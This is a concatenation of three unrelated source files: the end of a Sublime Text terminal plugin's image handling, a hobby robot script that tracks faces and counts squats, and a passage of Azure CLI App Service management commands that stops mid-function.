self.image_count += 1
p = view.add_phantom(
"terminus_image#{}".format(self.image_count),
sublime.Region(pt, pt),
IMAGE.format(
what=what,
data=data,
width=width,
height=height,
count=self.image_count),
sublime.LAYOUT_INLINE,
)
self.images[p] = image_path
if cr:
self.screen.index()
def clean_images(self):
view = self.view
for pid in list(self.images.keys()):
region = view.query_phantom(pid)[0]
if region.empty() and region.begin() == 0:
view.erase_phantom_by_id(pid)
if pid in self.images:
try:
os.remove(self.images[pid])
except Exception:
pass
del self.images[pid]
def __del__(self):
# make sure the process is terminated
self.process.terminate(force=True)
# remove images
for image_path in list(self.images.values()):
try:
os.remove(image_path)
except Exception:
pass
if self.process.isalive():
logger.debug("process becomes orphaned")
else:
logger.debug("process is terminated")
|
daisy_brain.py
|
#!/usr/bin/env python3
import sys
import os
import face_recognition
import cv2
from daisy_spine import DaisySpine
from daisy_spine import Dir
from daisy_eye import DaisyEye
from multiprocessing import Process, Queue
from multiprocessing.managers import SyncManager
import time
import argparse
class NeuronManager(SyncManager):
pass
NeuronManager.register('get_alexa_neuron')
connected = True
alexa_neuron = None
manager = NeuronManager(address=('', 4081), authkey=b'daisy')
try:
manager.connect()
alexa_neuron = manager.get_alexa_neuron()
print("Brain connected to neuron manager.")
except ConnectionRefusedError:
print("Brain not connected to neuron manager.")
connected = False
faces = {
"Jessie": "../faces/JPai-2.jpg",
"teddy": "../faces/Teddy-1.jpg",
"Vladimir": "../faces/Vlad-1.jpg"
}
name = "JessePai"
data = None
eye = None
X_THRES = 100
Z_CENTER = 1500
Z_THRES = 100
STANDING_THRES = 850
pid = -1
def begin_tracking(name, data_queue, video=True):
print("Begin Tracking")
print("Video: ", video)
eye = DaisyEye(faces, data_queue)
eye.find_and_track_kinect(None, "CSRT", video_out=video)
data_queue.close()
def daisy_action(data_queue, debug=True):
spine = DaisySpine()
print("Getting Data")
print("Debug: ", debug)
print(spine.read_all_lines())
data = None
prev_statement = ""
already_waiting = False
standing = True
prev_standing = True
while True:
state = None
direction = None
currCount = 0
if connected:
currNeuron = alexa_neuron.copy()
if "state" in currNeuron:
state = currNeuron.get("state")
if "count" in currNeuron:
currCount = currNeuron.get("count")
if state == "moving":
direction = currNeuron.get("direction")
if state is None or state == "idle" or state == "moving" or state == "exercise":
statement = ""
if direction is not None:
already_waiting = False
out = None
if direction == "left" or direction == "counterclockwise":
out = spine.turn(Dir.CCW)
elif direction == "right" or direction == "clockwise":
out = spine.turn(Dir.CW)
elif direction == "forward":
out = spine.forward()
elif direction == "backward":
out = spine.backward()
else:
out = spine.halt()
if debug:
statement = ("Moving:", direction, out)
if state == "exercise":
already_waiting = False
if not data_queue.empty():
data = data_queue.get()
if data:
(status, bbox, center, distance, res) = data
if status != "WAITING":
center_y = center[1]
if center_y < STANDING_THRES:
standing = True
if center_y > STANDING_THRES:
standing = False
if standing != prev_standing:
prev_standing = standing
currCount = currCount + 1
alexa_neuron.update([('count', currCount)])
print("Num Squats:", currCount)
if state == "idle" and not already_waiting:
print("Waiting")
alexa_neuron.update([('tracking', False)])
already_waiting = True
out = spine.halt()
statement = ("Idling", out)
if debug and statement != prev_statement:
prev_statement = statement
print(statement)
continue
if not data_queue.empty():
data = data_queue.get()
if data:
(status, bbox, center, distance, res) = data
if not status:
continue
if status == "STOP":
break
if status == "WAITING" and not already_waiting:
print("Waiting")
alexa_neuron.update([('tracking', False)])
already_waiting = True
out = spine.halt()
statement = ("Waiting for TARGET", out)
elif status != "WAITING":
already_waiting = False
center_x = center[0]
center_y = center[1]
res_center_x = int(res[0] / 2)
res_center_y = int(res[1] / 2)
out = None
if center_x < res_center_x - X_THRES:
out = spine.turn(Dir.CW)
elif center_x > res_center_x + X_THRES:
out = spine.turn(Dir.CCW)
elif distance > Z_CENTER + Z_THRES:
out = spine.forward()
elif distance < Z_CENTER - Z_THRES:
out = spine.backward()
else:
out = spine.halt()
if debug:
statement = (center_x, res_center_x, center, distance, res, out)
if debug and statement != prev_statement:
prev_statement = statement
print(statement)
data = None
print("Action Thread Exited")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Start Daisy's Brain")
parser.add_argument("--no-debug", action="store_const", const=True, help="Disable debug output")
parser.add_argument("--no-video", action="store_const", const=True, help="Disable video output")
args = parser.parse_args()
print("Daisy's Brain is Starting ^_^")
if connected:
# Clear alexa neuron.
alexa_neuron.clear()
data = Queue()
action_p = Process(target = daisy_action, args=(data, not args.no_debug, ))
action_p.daemon = True
action_p.start()
pid = action_p.pid
begin_tracking("JessePai", data, not args.no_video)
action_p.terminate()
print("Brain Terminated +_+")
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
from binascii import hexlify
from os import urandom
import json
import ssl
import sys
import OpenSSL.crypto
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.web.models import (Site, SiteConfig, User, AppServicePlan, SiteConfigResource,
SkuDescription, SslState, HostNameBinding, NameValuePair,
BackupRequest, DatabaseBackupSetting, BackupSchedule,
RestoreRequest, FrequencyUnit, Certificate, HostNameSslState,
RampUpRule, UnauthenticatedClientAction, ManagedServiceIdentity,
DeletedAppRestoreRequest, DefaultErrorResponseException)
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console
from azure.cli.core.util import open_page_in_browser
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory
from ._appservice_utils import _generic_site_operation
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group,
should_create_new_rg, set_location, check_if_asp_exists, check_app_exists,
get_lang_from_content)
from ._constants import (NODE_RUNTIME_NAME, OS_DEFAULT, STATIC_RUNTIME_NAME, PYTHON_RUNTIME_NAME)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, multicontainer_config_type=None, multicontainer_config_file=None,
tags=None):
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
is_linux = plan_info.reserved
node_default_version = '8.11.1'
location = plan_info.location
site_config = SiteConfig(app_settings=[])
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags)
helper = _StackRuntimeHelper(client, linux=is_linux)
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
"Please invoke 'list-runtimes' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Runtime '{}' is not supported. Please invoke 'list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long
match['setter'](match, site_config)
# Be consistent with portal: any windows webapp should have this even it doesn't have node in the stack
if not match['displayName'].startswith('node'):
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
else: # windows webapp without runtime specified
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
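# Illustrative results of the check above (argument values are assumptions):
# exactly one of runtime / container image / multicontainer config may be
# supplied, and the multicontainer type and file must come together.
#   validate_container_app_create_options(runtime='node|8.1')                       -> True
#   validate_container_app_create_options(deployment_container_image_name='nginx')  -> True
#   validate_container_app_create_options(multicontainer_config_type='COMPOSE',
#                                          multicontainer_config_file='compose.yml') -> True
#   validate_container_app_create_options('node|8.1', 'nginx')                      -> False
#   validate_container_app_create_options(multicontainer_config_type='COMPOSE')     -> False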
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
for name_value in settings + slot_settings:
# split at the first '=', appsetting should not have '=' in the name
settings_name, value = name_value.split('=', 1)
app_settings.properties[settings_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
from azure.mgmt.web.models import AzureStorageInfoValue
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
from azure.mgmt.web.models import AzureStorageInfoValue
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
import requests
import os
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
requests.post(zip_url, data=zip_content, headers=headers)
# check the status of async deployment
response = _check_zip_deployment_status(deployment_status_url, authorization, timeout)
return response
def get_sku_name(tier): # pylint: disable=too-many-return-statements
tier = tier.upper()
if tier == 'F1' or tier == "FREE":
return 'FREE'
elif tier == 'D1' or tier == "SHARED":
return 'SHARED'
elif tier in ['B1', 'B2', 'B3', 'BASIC']:
return 'BASIC'
elif tier in ['S1', 'S2', 'S3']:
return 'STANDARD'
elif tier in ['P1', 'P2', 'P3']:
return 'PREMIUM'
elif tier in ['P1V2', 'P2V2', 'P3V2']:
return 'PREMIUMV2'
elif tier in ['PC2', 'PC3', 'PC4']:
return 'PremiumContainer'
else:
raise CLIError("Invalid sku(pricing tier), please refer to command help for valid values")
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
result = list(client.deleted_web_apps.list())
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def assign_identity(cmd, resource_group_name, name, role='Contributor', slot=None, scope=None):
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='SystemAssigned')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, slot=None):
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='None')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(client, linux)
return [s['displayName'] for s in runtime_helper.stacks]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
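# Illustrative results of _format_fx_version (example image names are assumptions):
#   _format_fx_version("nginx")                      -> "DOCKER|nginx"
#   _format_fx_version("docker|nginx")               -> "docker|nginx"   (existing prefix kept)
#   _format_fx_version("<base64 config>", "COMPOSE") -> "COMPOSE|<base64 config>"
#   _format_fx_version("   ")                        -> " "              (blank input cleared)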
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
def update_site_configs(cmd, resource_group_name, name, slot=None,
linux_fx_version=None, windows_fx_version=None, php_version=None, python_version=None, # pylint: disable=unused-argument
net_framework_version=None, # pylint: disable=unused-argument
java_version=None, java_container=None, java_container_version=None, # pylint: disable=unused-argument
remote_debugging_enabled=None, web_sockets_enabled=None, # pylint: disable=unused-argument
always_on=None, auto_heal_enabled=None, # pylint: disable=unused-argument
use32_bit_worker_process=None, # pylint: disable=unused-argument
min_tls_version=None, # pylint: disable=unused-argument
http20_enabled=None, # pylint: disable=unused-argument
app_command_line=None, # pylint: disable=unused-argument
ftps_state=None): # pylint: disable=unused-argument
configs = get_site_configs(cmd, resource_group_name, name, slot)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
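# Build an SSL context for urlopen: older Pythons, and Windows in Cloud Shell, need an explicit
# TLS context instead of the default certificate-verifying one.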
def _ssl_context():
import platform
